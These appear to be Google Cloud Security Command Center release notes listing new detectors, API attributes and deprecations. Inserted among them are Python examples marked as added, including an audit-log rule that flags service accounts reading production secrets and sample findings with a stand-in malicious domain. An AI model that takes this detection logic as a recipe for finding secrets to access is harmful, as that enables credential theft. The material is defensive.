Security Command Center release notes

This page documents production updates to Security Command Center and the products and features available in the Security Command Center Premium and Standard tiers. You can periodically check this page for announcements about new or updated features, bug fixes, known issues, and deprecated functionality.

You can see the latest product updates for all of Google Cloud on the Google Cloud page, browse and filter all release notes in the Google Cloud console, or programmatically access release notes in BigQuery.

To get the latest product updates delivered to you, add the URL of this page to your feed reader, or add the feed URL directly: https://cloud.google.com/feeds/scc-release-notes.xml

March 21, 2024

Security Command Center detectors are now mapped to the following additional compliance frameworks:

  • CIS Critical Security Controls v8
  • Cloud Controls Matrix v4
  • HIPAA
  • ISO 27001 (2022)
  • NIST 800-53 (rev 5)
  • NIST Cybersecurity Framework (v1.0)
  • PCI-DSS 4.0
  • SOC 2 (2017)

March 20, 2024

New misconfiguration detectors for AlloyDB for PostgreSQL clusters released to General Availability

Security Health Analytics, a built-in service of Security Command Center, released new detectors to General Availability. The following detectors, which are available only with the Premium tier of Security Command Center, detect misconfigurations in AlloyDB for PostgreSQL clusters and instances:

  • ALLOYDB_AUTO_BACKUP_DISABLED: Automated backups are not enabled in AlloyDB for PostgreSQL cluster.
  • ALLOYDB_LOG_ERROR_VERBOSITY: Instance database flag log_error_verbosity for AlloyDB for PostgreSQL instance is not set to default or another less restrictive value.
  • ALLOYDB_LOG_MIN_ERROR_STATEMENT_SEVERITY: Instance database flag log_min_error_statement for AlloyDB for PostgreSQL instance is not set to ERROR or lower.
  • ALLOYDB_LOG_MIN_MESSAGES: Instance database flag log_min_messages for AlloyDB for PostgreSQL instance is not set to at minimum warning.

For more information, see SQL vulnerability findings.
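The four AlloyDB detector descriptions above map directly onto checks you can run yourself against an instance's database flags, for example to pre-screen a configuration before it reaches an environment that Security Health Analytics scans. The following Python is an added example, not Google's detector code: the severity orderings are PostgreSQL's own, and the rule thresholds (verbosity at least `default`, `log_min_error_statement` at most `error`, `log_min_messages` at most `warning`) and the treatment of an unset flag as the PostgreSQL server default are this example's reading of the detector descriptions. The cluster and instance names are constructed.

```python
"""Evaluate AlloyDB for PostgreSQL flags against the four detector rules
announced above. Added example; not Security Health Analytics code."""

# PostgreSQL message severities from least to most severe, as used by the
# log_min_* settings (PostgreSQL orders LOG after ERROR for these two flags).
PG_MIN_LEVELS = ["debug5", "debug4", "debug3", "debug2", "debug1", "info",
                 "notice", "warning", "error", "log", "fatal", "panic"]

# log_error_verbosity values from least to most detail.
VERBOSITY = ["terse", "default", "verbose"]

# PostgreSQL server defaults. Assumption: an instance that does not set a
# flag behaves as the server default and therefore passes the check.
PG_DEFAULTS = {
    "log_error_verbosity": "default",
    "log_min_error_statement": "error",
    "log_min_messages": "warning",
}


def _flag(flags, name):
    """Return the lower-cased flag value, or the PostgreSQL default if unset."""
    return str(flags.get(name, PG_DEFAULTS[name])).lower()


def evaluate_instance_flags(flags):
    """Return the detector categories that fire for one instance's flags."""
    findings = []

    v = _flag(flags, "log_error_verbosity")
    # Must be 'default' or a less restrictive (more detailed) value.
    # An unknown value also fires, since it cannot be shown to comply.
    if v not in VERBOSITY or VERBOSITY.index(v) < VERBOSITY.index("default"):
        findings.append("ALLOYDB_LOG_ERROR_VERBOSITY")

    s = _flag(flags, "log_min_error_statement")
    # Must be ERROR or lower, so statements failing at ERROR are logged.
    if s not in PG_MIN_LEVELS or PG_MIN_LEVELS.index(s) > PG_MIN_LEVELS.index("error"):
        findings.append("ALLOYDB_LOG_MIN_ERROR_STATEMENT_SEVERITY")

    m = _flag(flags, "log_min_messages")
    # Must be at minimum warning, i.e. warning or a more verbose level.
    if m not in PG_MIN_LEVELS or PG_MIN_LEVELS.index(m) > PG_MIN_LEVELS.index("warning"):
        findings.append("ALLOYDB_LOG_MIN_MESSAGES")

    return findings


def evaluate_cluster(cluster):
    """cluster: {'name', 'automated_backup_enabled', 'instances': {name: flags}}.
    Returns {resource name: [categories]} for every resource with a finding."""
    results = {}
    if not cluster.get("automated_backup_enabled", False):
        results[cluster["name"]] = ["ALLOYDB_AUTO_BACKUP_DISABLED"]
    for inst_name, flags in cluster.get("instances", {}).items():
        cats = evaluate_instance_flags(flags)
        if cats:
            results[inst_name] = cats
    return results


# Constructed sample cluster; these are not real resources.
SAMPLE_CLUSTER = {
    "name": "projects/example-project/locations/us-central1/clusters/demo",
    "automated_backup_enabled": False,
    "instances": {
        "demo-primary": {"log_error_verbosity": "terse",
                         "log_min_error_statement": "panic",
                         "log_min_messages": "error"},
        "demo-replica": {},  # nothing set: PostgreSQL defaults, passes
    },
}

if __name__ == "__main__":
    for resource, cats in evaluate_cluster(SAMPLE_CLUSTER).items():
        print(resource, "->", ", ".join(cats))
```

The replica with no flags set produces no findings, while the primary trips all three flag checks and the cluster itself trips the backup check; tightening `log_min_messages` to `error` is the kind of change that looks harmless but silently drops the warnings an investigation later depends on.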

February 29, 2024

Security Command Center API v2 released to Preview

The Security Command Center API v2, which enables data residency control and includes the /locations/LOCATION field in resource names, is released to Preview.

For more information, see the REST reference Security Command Center API Overview.

Data residency for Security Command Center released to Preview

Security Command Center data residency control is released to Preview. Security Command Center supports the following data locations:

  • European Union (eu)
  • United States (us)
  • Global (global)

For more information, see Data residency.

February 28, 2024

Virtual Machine Threat Detection, a built-in service of Security Command Center Premium, has launched a new detector, Defense Evasion: Rootkit, in Preview.

The detector monitors virtual machines and generates a finding if a combination of signals matching a known kernel-mode rootkit is present.

For more information, see Virtual Machine Threat Detection overview.

February 20, 2024

Manual control of finding state deprecated for vulnerabilities and misconfigurations

Starting October 21, 2024, you will no longer be able to manually update the state of vulnerability or misconfiguration findings that are issued by Security Health Analytics or VM Manager. Security Command Center will return an error message on manual attempts to change the values of the state. Security Command Center will also begin preventing the manual creation of findings under the exact same name as a source that is automatically managed by Security Command Center in order to prevent the creation of findings that can never be resolved.

For more information, see Finding states.

Pane on Overview page that supports postures for Vertex AI released to Preview

A pane on the Overview page lets you monitor for vulnerabilities that were found by the Security Health Analytics custom modules that apply to Vertex AI, and lets you view any drift from the Vertex AI organization policies that are defined in a posture.

For more information, see Monitor posture drift.

February 14, 2024

Support for VPC Service Controls released to General Availability

You can now protect Security Command Center using VPC Service Controls perimeters. For more information, see VPC Service Controls supported products.

February 11, 2024

Exports of compliance reports will require new permissions

On or after March 15, 2024, a new Identity and Access Management (IAM) permission will be required to export a compliance report from the Google Cloud console. If you use custom roles to control access to Google Cloud resources, you will need to add this new permission to your custom roles before that date to continue exporting compliance reports.

For more information, see Export a compliance report.

February 06, 2024

New security posture service released to General Availability

The new security posture service is released to General Availability. This service lets you create and deploy postures so that you can define the policies for your Google Cloud organization and monitor for drift.

For more information, see Security posture overview.

Mandiant analyst CVE ratings added to vulnerability findings

The addition of CVE information, including ratings of the vulnerability by Mandiant Threat Intelligence analysts, to the details of Security Command Center vulnerability findings is released to Preview. You can now prioritize vulnerabilities based on the exploitability and impact ratings from Mandiant. For more information, see Prioritize vulnerability findings to reduce risk.

Improvements to compliance standards support now available

Improvements to the Security Command Center Compliance page in the Google Cloud console are released to General Availability. Your state of compliance with all supported standards is now presented more clearly and a new Compliance details page makes it easier to see failing controls. For more information, see Assess and report compliance.

Prioritize high-value resources automatically by data sensitivity

The optional integration of the Sensitive Data Protection discovery feature with the Security Command Center attack path simulation feature is released to Preview. If you use Sensitive Data Protection discovery, you can choose to have the priority value of supported high-value resources set automatically based on whether they contain medium-sensitivity or high-sensitivity data. For more information, see Set resource priority values automatically by data sensitivity.

Attack exposure scores informed by Mandiant Threat Intelligence

The inclusion of CVE exploitability ratings in the calculation of attack exposure scores for vulnerability findings is released to Preview. The ratings, which are provided by Mandiant Threat Intelligence analysts, enable Security Command Center attack path simulations to provide more accurate scores for prioritizing vulnerability findings. For more information, see Incorporation of CVE data.

High-value resources now include attack exposure scores

The calculation of attack exposure scores for high-value resources by the Security Command Center Attack Path Simulations feature is released to Preview. Use attack exposure scores on resources to proactively secure the resources that are the most valuable to your business. For more information, see Attack exposure scores.

January 31, 2024

Virtual Machine Threat Detection, a built-in service of Security Command Center, launched the Malware: Malicious file on disk (YARA) detector to Preview. This detector generates a finding if an executable file in a virtual machine matches known malware signatures.

January 26, 2024

Security Command Center Management API released to General Availability

The Security Command Center Management API, which provides API support for managing settings and custom modules, is released to General Availability.

For more information, see Security Center Management API.

January 24, 2024

New Container Threat Detection service account deferred

The new service account for Container Threat Detection that was included with new activations of Security Command Center after December 7, 2023 was temporarily removed from new activations on December 19, 2023 due to issues with older GKE clusters.

If you activated Security Command Center during this time period, all issues have been resolved and there is no impact to your experience.

New activations of Security Command Center will use the service account that was used prior to December 7, 2023 with the Container Threat Detection service until further notice.

For more information about the new service account, see Required IAM permissions.

January 10, 2024

Issue that caused finding severities to change unexpectedly is resolved

Between December 11, 2023 and January 10, 2024, an issue might have changed the severities of some findings unexpectedly. As of today, the issue has been fixed for all customers. Any finding severities that were changed have been returned to their original state.

December 15, 2023

The custom modules feature for Event Threat Detection is now in General Availability. This feature lets you create custom Event Threat Detection detectors that meet the unique needs of your organization.

In addition, the Unexpected Cloud API Call module type is now available. This module type lets you create a custom module that detects when a specified principal calls a specified method against a specified resource.

For more information, see Overview of custom modules for Event Threat Detection.
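The Unexpected Cloud API Call module type matches on three things: the principal, the method, and the resource. The following Python is an added example that applies that same three-way match offline to Cloud Audit Log entries, so you can check how a candidate rule behaves against known log samples before deploying a custom module. It is not the Event Threat Detection implementation; the rule key names (`caller_pattern`, `method_pattern`, `resource_pattern`) are this example's own, the audit log lines are constructed, and the fields read (`protoPayload.authenticationInfo.principalEmail`, `protoPayload.methodName`, `protoPayload.resourceName`) are the standard Cloud Audit Log fields.

```python
"""Match Cloud Audit Log entries against a principal/method/resource rule.
Added example; not Event Threat Detection's module code."""
import json
import re

RULE_KEYS = ("caller_pattern", "method_pattern", "resource_pattern")


def compile_rule(rule):
    """Compile the rule's three regular expressions (full-match semantics)."""
    return {k: re.compile(rule[k]) for k in RULE_KEYS}


def _fields(entry):
    """Extract (principal, method, resource) from one audit log entry."""
    payload = entry.get("protoPayload", {})
    caller = payload.get("authenticationInfo", {}).get("principalEmail", "")
    return caller, payload.get("methodName", ""), payload.get("resourceName", "")


def entry_matches(compiled, entry):
    """True only when all three patterns match the corresponding field."""
    caller, method, resource = _fields(entry)
    return (compiled["caller_pattern"].fullmatch(caller) is not None
            and compiled["method_pattern"].fullmatch(method) is not None
            and compiled["resource_pattern"].fullmatch(resource) is not None)


def scan_audit_log(rule, log_lines):
    """Return (insertId, principal, method, resource) for each matching entry.
    Lines that are not valid JSON are skipped instead of aborting the scan."""
    compiled = compile_rule(rule)
    hits = []
    for line in log_lines:
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue
        if entry_matches(compiled, entry):
            hits.append((entry.get("insertId"),) + _fields(entry))
    return hits


# Example rule: any user-managed service account of example-project reading a
# secret version that lives in the separate prod-project.
RULE = {
    "caller_pattern": r".*@example-project\.iam\.gserviceaccount\.com",
    "method_pattern": r"google\.cloud\.secretmanager\.v1\.SecretManagerService\.AccessSecretVersion",
    "resource_pattern": r"projects/prod-project/secrets/.*",
}


def _entry(insert_id, principal, method, resource):
    """Build a constructed audit log line trimmed to the fields used here."""
    return json.dumps({
        "insertId": insert_id,
        "protoPayload": {
            "authenticationInfo": {"principalEmail": principal},
            "methodName": method,
            "resourceName": resource,
        },
    })


SA = "ci-builder@example-project.iam.gserviceaccount.com"
ACCESS = "google.cloud.secretmanager.v1.SecretManagerService.AccessSecretVersion"

# Constructed sample log; none of these are real events.
SAMPLE_LOG = [
    _entry("a1", SA, ACCESS, "projects/prod-project/secrets/db-password/versions/3"),
    _entry("a2", SA, ACCESS, "projects/example-project/secrets/ci-token/versions/1"),
    _entry("a3", "alice@example.com", ACCESS, "projects/prod-project/secrets/db-password/versions/3"),
    _entry("a4", SA, "google.cloud.secretmanager.v1.SecretManagerService.ListSecrets", "projects/prod-project/secrets/db-password"),
    "this line is not JSON and must be skipped",
]

if __name__ == "__main__":
    for hit in scan_audit_log(RULE, SAMPLE_LOG):
        print(hit)
```

Only the first entry satisfies all three patterns: the second fails on resource, the third on principal, the fourth on method. Using `fullmatch` rather than `search` is deliberate, because a pattern such as `projects/prod-project/secrets/.*` would otherwise also match a resource whose name merely contains that string further in.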

December 13, 2023

Custom roles will require new permissions for custom modules

On or after January 22, 2024, new Identity and Access Management (IAM) permissions will be required to work with custom modules for both Event Threat Detection and Security Health Analytics. If you use custom roles to control access to Google Cloud resources, you will need to add these new permissions to your custom roles before that date to continue working with custom modules.

For more information, see the following:

December 11, 2023

New Container Threat Detection service account with new activations

For activations of Security Command Center after December 7, 2023, Container Threat Detection uses a new service account for Identity and Access Management (IAM) permissions.

During the activation process, new users grant permissions to two service accounts: one for Security Command Center and one for Container Threat Detection. The new service account speeds the first-time enablement of Container Threat Detection.

If you activated Security Command Center prior to December 7, 2023, Container Threat Detection remains unchanged and continues to use its original service account.

For more information, see Service agent roles.

December 07, 2023

New goal-based query presets for identity and access misconfigurations

New goal-based query presets on the Security Command Center Vulnerabilities page are released to Preview.

The query presets support cloud infrastructure entitlement management (CIEM) by filtering vulnerability finding categories to those that are related to principal accounts that are misconfigured or that have excessive permissions to Google Cloud resources.

For more information, see Goal-based query presets.

December 04, 2023

Policy Controller integration released to General Availability

The integration of Policy Controller for Kubernetes clusters with Security Command Center is released to General Availability. Violation alerts from Policy Controller appear in Security Command Center as misconfiguration findings.

For more information, see Policy Controller.

November 10, 2023

Policy Controller integration now in Preview

The integration of Policy Controller for Kubernetes clusters with Security Command Center is released to Preview. Violation alerts from Policy Controller now appear in Security Command Center as misconfiguration findings.

For more information, see Policy Controller.

November 08, 2023

Support for VPC Service Controls released to Preview

You can now protect Security Command Center using VPC Service Controls perimeters. For more information, see VPC Service Controls supported products.

October 19, 2023

Backup and DR Service threat detectors available in Security Command Center Premium

Event Threat Detection, a built-in service of Security Command Center, released new rules for the Google Cloud Backup and DR service to Preview. Security Command Center can now detect the following:

  • Backup and DR actions that inhibit system recovery
  • Backup and DR actions that result in data destruction

For more information, see:

October 18, 2023

Container Threat Detection, a built-in service of Security Command Center Premium, has launched a new detector, Unexpected Child Shell, in Preview.

The detector monitors all process executions and generates a finding if a process that does not normally invoke shells spawns a shell process.

For more information, see Container Threat Detection detectors.

October 09, 2023

Cloud IDS threat detections available in Security Command Center

Threats that are detected by Cloud IDS, a Google Cloud intrusion detection service, are now included in the findings that are issued by the Event Threat Detection service of Security Command Center. This feature is available in Preview.

For more information, see:

September 29, 2023

containsOnly() function released to General Availability

You can now use the containsOnly() function to query findings with an array-type attribute or subfield that only contains values that match the specified filter, and no other values.

For more information, see The containsOnly function.

September 20, 2023

Attack path simulations support additional resources

The attack path simulation feature that generates attack exposure scores and attack paths for your high-value resources now supports the following additional Google Cloud resources:

  • aiplatform.googleapis.com/Dataset
  • aiplatform.googleapis.com/Featurestore
  • aiplatform.googleapis.com/MetadataStore
  • aiplatform.googleapis.com/Model
  • aiplatform.googleapis.com/TrainingPipeline
  • container.googleapis.com/Cluster

For more information, see Resource types supported in high-value resource sets.

September 19, 2023

Vulnerabilities per resource type graphic released to General Availability

The Security Command Center Overview page in the Cloud console now shows a Vulnerabilities per resource type graphic, which replaces the Active vulnerabilities over time by severity graphic. The Vulnerabilities per resource type graphic shows the resources in your organization (for example, Cloud Storage buckets, Compute Engine instances, and firewalls), how many active vulnerabilities exist for each resource, and the severity of those vulnerabilities.

September 15, 2023

Event Threat Detection, a built-in service of Security Command Center, released a new rule, Initial Access: Leaked Service Account Key Used, to General Availability.

For more information, see Event Threat Detection rules.

September 11, 2023

Security Command Center now supports CIS Google Cloud Computing Foundations Benchmark v2.0.0.

The support for v2.0.0 includes the following new vulnerability detector:

  • Load balancer logging disabled

For more information, see the following:

August 21, 2023

inIpRange() function released to General Availability

You can now specify a range of IP addresses by using the inIpRange() function in query statements to filter findings that contain IPv4 or IPv6 addresses within the specified range.

For more information, see The inIpRange function.
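The two query functions announced on this page, inIpRange() (August 21, 2023) and containsOnly() (September 29, 2023), both express a predicate over a finding field that is easy to get subtly wrong when reproduced in tooling: IP range checks must cope with mixed IPv4/IPv6 values and fields that are not addresses at all, and "only matching values" must fail as soon as one extra value is present. The following Python is an added example of both predicates applied to exported findings offline; it is not Security Command Center's own implementation, the findings are constructed, and the fields used (`access.callerIp` and `indicator.domains`) are assumed for the sake of the sample.

```python
"""Offline equivalents of the inIpRange() and containsOnly() predicates
applied to exported findings. Added example; not Security Command Center code."""
import ipaddress
import re


def in_ip_range(value, cidr):
    """True if value is an IPv4 or IPv6 address inside cidr.
    Non-address values (empty, hostnames, garbage) and a malformed cidr
    return False rather than raising."""
    try:
        addr = ipaddress.ip_address(value)
        net = ipaddress.ip_network(cidr, strict=False)
    except ValueError:
        return False
    # An IPv4 address is never inside an IPv6 network and vice versa.
    return addr.version == net.version and addr in net


def contains_only(values, pattern):
    """True if every element of values matches pattern and the array is
    non-empty. Assumption: an empty array does not match (the page does
    not state how containsOnly() treats empty arrays)."""
    if not values:
        return False
    rx = re.compile(pattern)
    return all(rx.fullmatch(v) is not None for v in values)


def _get(obj, path):
    """Dotted-path lookup that returns None for any missing step."""
    for key in path.split("."):
        if not isinstance(obj, dict) or key not in obj:
            return None
        obj = obj[key]
    return obj


def findings_in_ip_range(findings, field, cidr):
    """Names of findings whose `field` holds an address inside cidr."""
    return [f["name"] for f in findings if in_ip_range(_get(f, field) or "", cidr)]


def findings_contains_only(findings, field, pattern):
    """Names of findings whose array `field` holds only values matching pattern."""
    return [f["name"] for f in findings if contains_only(_get(f, field) or [], pattern)]


# Constructed sample findings using documentation address/domain ranges.
SAMPLE_FINDINGS = [
    {"name": "f1", "access": {"callerIp": "203.0.113.17"},
     "indicator": {"domains": ["a.example.com", "b.example.com"]}},
    {"name": "f2", "access": {"callerIp": "198.51.100.5"},
     "indicator": {"domains": ["a.example.com", "evil.example.net"]}},
    {"name": "f3", "access": {"callerIp": "2001:db8::1"},
     "indicator": {"domains": []}},
    {"name": "f4", "access": {"callerIp": "not-an-ip"}},
    {"name": "f5"},
]

if __name__ == "__main__":
    print(findings_in_ip_range(SAMPLE_FINDINGS, "access.callerIp", "203.0.113.0/24"))
    print(findings_in_ip_range(SAMPLE_FINDINGS, "access.callerIp", "2001:db8::/32"))
    print(findings_contains_only(SAMPLE_FINDINGS, "indicator.domains", r".*\.example\.com"))
```

Note that `0.0.0.0/0` selects only the IPv4 findings; an "all addresses" filter needs a second, IPv6 range. Likewise `f2` is excluded by the containsOnly check because a single non-matching domain is enough, which is the property that makes the function useful for confirming that a finding touches nothing outside an allowlist.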

August 16, 2023

New assets experience released to General Availability

The Security Command Center Assets page in the Cloud console is now powered by Cloud Asset Inventory. The new Assets page provides expanded asset visibility and includes a new asset query feature.

This release is part of the planned deprecation of the Security Command Center Assets API scheduled for on or after June 20, 2024.

For more information, see Assets page.

August 03, 2023

Attack exposure scores and attack paths released to General Availability

The attack path simulation feature that generates attack exposure scores and attack paths for findings that expose your high-value resources is now released to General Availability.

For information about the feature, see Attack exposure scores and attack paths.

AI-generated summaries of the simulated attack paths for Security Command Center findings are released to Preview. When you view the attack path for a finding, you can now read explanations that are generated dynamically by artificial intelligence (AI).

For more information, see AI-generated summaries.

July 31, 2023

The Security Health Analytics detector NETWORK_POLICY_DISABLED now recognizes network policies that are implemented by using GKE Dataplane V2.

For more information, see the following:

July 26, 2023

The custom modules feature for Event Threat Detection is now in Preview. Custom modules allow you to define custom detectors for Event Threat Detection.

For more information, see Overview of custom modules for Event Threat Detection.

July 14, 2023

AI-generated summaries of Security Command Center findings are released to Preview. When you view finding details, you can now read explanations that are generated dynamically by artificial intelligence (AI).

For more information, see AI-generated summaries.

July 13, 2023

Recommendations from the IAM recommender are now available as findings in Security Command Center in a Preview release.

The following IAM recommender recommendations are now published as Vulnerability class findings in Security Command Center:

  • IAM role has excessive permissions
  • Service agent role replaced with basic role
  • Service agent granted basic role
  • Unused IAM role

For more information, see Security sources > IAM recommender.

June 28, 2023

As of June 20, 2023, Security Command Center Asset API endpoints and dependent functionality are deprecated and will be removed from the product for all users on or after June 20, 2024. Use Cloud Asset Inventory and its API instead.

After June 20, 2023, the asset functionality is not included with new activations of Security Command Center.

If you activated Security Command Center before June 20, 2023, but have not used the asset functionality in the 90 days prior to June 20, 2023, the asset functionality is removed.

If you activated Security Command Center before June 20, 2023, and have used the asset functionality in the 90 days prior to June 20, 2023, the asset functionality remains available for you until June 20, 2024 or later.

The deprecation applies to the following Security Command Center interfaces:

  • Security Command Center Asset API endpoints
  • Except for gcloud scc assets update-marks, which is not deprecated, the assets subgroup of the gcloud scc CLI command
  • The Assets page and related functionality in the Google Cloud Console

June 22, 2023

Only the Security Center Service Agent (roles/securitycenter.serviceAgent) role is required by the Security Command Center service account. Previously, the service account also required the roles/serviceusage.serviceUsageAdmin and roles/cloudfunctions.serviceAgent roles to work properly.

June 21, 2023

Event Threat Detection, a built-in service of Security Command Center, released the following new rules to General Availability.

  • Initial Access: Dormant Service Account Action
  • Privilege Escalation: Dormant Service Account Granted Sensitive Role
  • Persistence: Impersonation Role Granted For Dormant Service Account
  • Initial Access: Dormant Service Account Key Created

For more information, see Event Threat Detection rules.

June 12, 2023

New Finding attribute: userAgent

The userAgent attribute is added to the Access object, which is included in the Finding object of the Security Command Center API.

The userAgent attribute identifies the user agent of the caller that is associated with a Security Command Center finding.

For more information, see the Security Command Center API documentation for the Finding object.

June 08, 2023

Usage-based pricing for organization-level activations of Security Command Center

You can now use usage-based pricing instead of a fixed-price subscription to activate Security Command Center Premium tier at the organization level. The feature lets you activate Security Command Center at the organization level yourself in the Cloud console. Billing for organization-level activations of Security Command Center is based on the resource consumption in your organization and uses a usage-based pricing model.

For more information, see Overview of organization-level activation.

Security Command Center Cryptomining Protection Program

The Security Command Center Cryptomining Protection Program is launched to General Availability. The program offers financial protection up to $1 million USD to cover unauthorized Google Cloud compute expenses that are associated with undetected cryptocurrency mining attacks for Security Command Center Premium customers.

For more information, see Security Command Center Cryptomining Protection Program.

June 02, 2023

The Google Cloud console has been updated to change how you open Security Command Center pages. Previously, you selected pages using tabs on the main page. Now you select pages from the slide-out menu on the left side of the console. To show the menu, hold your pointer over the icons on the left side of the console.

For an overview of the pages, see Using Security Command Center in the Google Cloud console.

May 17, 2023

With project-level activations of the Security Command Center Premium tier, you can now enable certain Premium-tier threat and vulnerability findings that require organization-level access by activating the Standard tier at the organization level in addition to your project-level activation. These finding categories were previously unsupported with project-level activations.

For more information, see Premium tier feature support with project-level activations.

May 15, 2023

The pricing for project-level activations of Security Command Center has been reduced by lowering the Security Command Center rate for the usage of the following Google Cloud services:

  • Compute Engine
  • GKE-Autopilot
  • App Engine
  • Cloud SQL

For more information, see Pricing for project-level activations.

May 04, 2023

An issue that affected the display of the counts of controls for certain CIS Google Cloud Platform Benchmark (CIS Benchmark) reports in the Google Cloud console has been fixed.

On March 31, 2023, an update to Security Health Analytics affected the behavior of certain detectors for versions 1.0, 1.1, and 1.2 of the CIS Benchmark reports. The count of controls for CIS Benchmark version 1.3, as well as any CSV exports, were unaffected.

Between March 31, 2023 and May 4, 2023, the following detectors might have been counted and grouped under the incorrect CIS level on the Compliance tab of Security Command Center:

  • API_KEY_EXISTS
  • API_KEY_APIS_UNRESTRICTED
  • API_KEY_NOT_ROTATED
  • FIREWALL_NOT_MONITORED
  • ROUTE_NOT_MONITORED
  • NETWORK_NOT_MONITORED
  • BUCKET_IAM_NOT_MONITORED
  • SQL_INSTANCE_NOT_MONITORED
  • VPC_FLOW_LOGS_SETTINGS_NOT_RECOMMENDED
  • SQL_LOG_STATEMENT
  • ACCESS_TRANSPARENCY_DISABLED

April 26, 2023

Event Threat Detection, a built-in service of Security Command Center, launched the following new rules to Preview.

  • Persistence: Impersonation Role Granted For Dormant Service Account
  • Privilege Escalation: Dormant Service Account Granted Sensitive Role

The Persistence: Impersonation Role Granted For Dormant Service Account rule detects events where a principal is granted permissions to impersonate a dormant user-managed service account.

The Privilege Escalation: Dormant Service Account Granted Sensitive Role rule detects events where a dormant user-managed service account was granted one or more sensitive IAM roles.

For more information, see Event Threat Detection rules.

April 13, 2023

Event Threat Detection, a built-in service of Security Command Center, launched the following new rules to Preview.

  • Defense Evasion: Breakglass Workload Deployment Created
  • Defense Evasion: Breakglass Workload Deployment Updated

These rules detect when the break-glass flag is used to override Binary Authorization controls when deploying or updating workloads. For more information, see Event Threat Detection rules.

April 12, 2023

The custom modules feature for Security Health Analytics is now generally available (GA). Custom modules allow you to define custom detectors for Security Health Analytics.

For more information, see Overview of custom modules for Security Health Analytics.

April 11, 2023

Event Threat Detection, a built-in service of Security Command Center, launched the following new rules to General Availability.

  • Privilege Escalation: Anomalous Impersonation of Service Account for Admin Activity
  • Privilege Escalation: Anomalous Multistep Service Account Delegation for Admin Activity
  • Privilege Escalation: Anomalous Multistep Service Account Delegation for Data Access
  • Privilege Escalation: Anomalous Service Account Impersonator for Admin Activity
  • Privilege Escalation: Anomalous Service Account Impersonator for Data Access

These rules detect anomalous activities that are taken by someone who is using an impersonated service account to access Google Cloud. For more information, see Event Threat Detection rules.

April 06, 2023

The legacy version of the Findings tab is removed from Security Command Center in the Google Cloud console. You can work with findings in the Google Cloud console only by using the new version of the Findings tab.

For more information, see Work with findings in the Google Cloud console.

April 03, 2023

The moduleName attribute is added to the Finding object of the Security Command Center API.

The moduleName attribute, when included in a finding, identifies the full resource name of the specific detection module of the Security Command Center service that generated the finding.

For more information, see the Security Command Center API documentation for the Finding object.

March 31, 2023

Security Command Center supports CIS Google Cloud Computing Foundations Benchmark v1.3.0.

The following detectors are new for v1.3.0:

  • Access transparency disabled
  • Cloud Asset API disabled
  • Dataproc CMEK disabled
  • Essential contacts not configured
  • Flow logs settings not recommended

The following detectors have been updated:

  • Audit logging disabled

For more information about Security Command Center support for standards and compliance, see the following:

March 23, 2023

The March 20, 2023 release of the Google Cloud SCC content pack for sending Security Command Center data to Cortex XSOAR is generally available.

This version includes support for multiple Google Cloud organizations, bug fixes, and supportability improvements.

For information about downloading and installing the new content pack, see Upgrade the Google Cloud SCC content pack.

The version 3.0 release of the Google SCC App for QRadar, which lets you send Security Command Center data to QRadar v7.4.1FP2+, is generally available.

This version includes support for multiple Google Cloud organizations, bug fixes, and supportability improvements.

For information about downloading and installing the new application, see Upgrade the Google SCC app.

The version 3.0 release of the Google SCC App for ELK, which lets you send Security Command Center data to Elastic Stack, is generally available.

This version includes support for multiple Google Cloud organizations, bug fixes, and supportability improvements.

For information about downloading and installing the new application, see Upgrade the Docker container.

The version 2.0 release of the Google SCC Add-on For Splunk and the Google SCC App For Splunk, which let you send Security Command Center data to Splunk, is generally available.

This version includes support for multiple Google Cloud organizations, bug fixes, and supportability improvements.

For information about downloading and installing the new applications, see Upgrade Google SCC App for Splunk and Google SCC Add-on for Splunk.

March 17, 2023

Virtual Machine Threat Detection, a built-in service of Security Command Center, launched the following detectors to Preview.

  • Defense Evasion: Unexpected kernel code modification
  • Defense Evasion: Unexpected kernel read-only data modification
  • Defense Evasion: Unexpected ftrace handler
  • Defense Evasion: Unexpected interrupt handler
  • Defense Evasion: Unexpected kernel modules
  • Defense Evasion: Unexpected kprobe handler
  • Defense Evasion: Unexpected processes in runqueue
  • Defense Evasion: Unexpected system call handler

These modules analyze runtime Linux kernel integrity to detect common evasion techniques used by malware.

The following attributes were added to the Finding object of the Security Command Center API.

  • cloudDlpInspection
  • cloudDlpDataProfile

The cloudDlpInspection attribute provides details about the results of a Cloud Data Loss Prevention (Cloud DLP) inspection job. The cloudDlpDataProfile attribute provides the name of a Cloud DLP data profile that is associated with a finding.

For more information, see the Security Command Center API documentation for the Finding object.

Event Threat Detection, a built-in service of Security Command Center Premium, has launched the Initial Access: Excessive Permission Denied Actions rule to General Availability. This rule detects events where a principal repeatedly triggers permission denied errors across multiple methods and services.

For more information about Event Threat Detection findings, see Event Threat Detection rules.

March 01, 2023

The legacy version of the Findings tab in the Security Command Center dashboard in the Cloud console is now deprecated. Similar functionality is currently available in the new version of the Findings tab.

After March 31, 2023, the option to use the legacy Findings tab will be removed from the dashboard. After that date, you will be able to work with findings in the console only by using the newer, default version of the Findings tab.

For more information about working with Security Command Center findings by using the default Findings tab, see Work with findings in the Security Command Center.

February 07, 2023

Event Threat Detection, a built-in service of Security Command Center, launched the Persistence: New API Method rule to General Availability. This rule detects anomalous usage of Google Cloud services by IAM service accounts. For more information, see Event Threat Detection rules.

February 06, 2023

The version 1.0 release of the Google SCC ITSM app and the Google SCC SIR app, which let you send data, such as findings, sources, assets, and audit logs, from Security Command Center to ServiceNow, is generally available. For information about downloading and installing the new applications, see Sending Security Command Center data to ServiceNow.

January 30, 2023

Project-level activation of Security Command Center

The Security Command Center project-level activation feature is generally available. The feature lets you enable Security Command Center for individual Google Cloud projects yourself in the Cloud console. Billing for project-level activations of Security Command Center is based on resource consumption in the project and uses a pay-as-you-go billing model.

For more information, see Overview of project-level activation.

January 27, 2023

The new and improved Findings page in the Cloud Console is now generally available and the default view for working with Security Command Center findings. With the redesigned Findings page, you can query, filter, and investigate Security Command Center findings faster and more efficiently. For more information, see Work with findings in the Security Command Center dashboard.

December 22, 2022

The userName attribute was added to the Finding object of the Security Command Center API.

The value of the userName attribute depends on the type of the finding and is likely not an IAM principal. For example, it can be a system username if the finding is related to a virtual machine, or it can be an application login username.

For more information, see the Security Command Center API documentation for the Finding object.

December 16, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the Initial Access: Dormant Service Account Action rule to Preview. This rule detects events where a dormant user-managed service account triggered an action. For more information, see Event Threat Detection rules.

December 15, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the following rules to Preview.

  • Privilege Escalation: Anomalous Impersonation of Service Account for Admin Activity
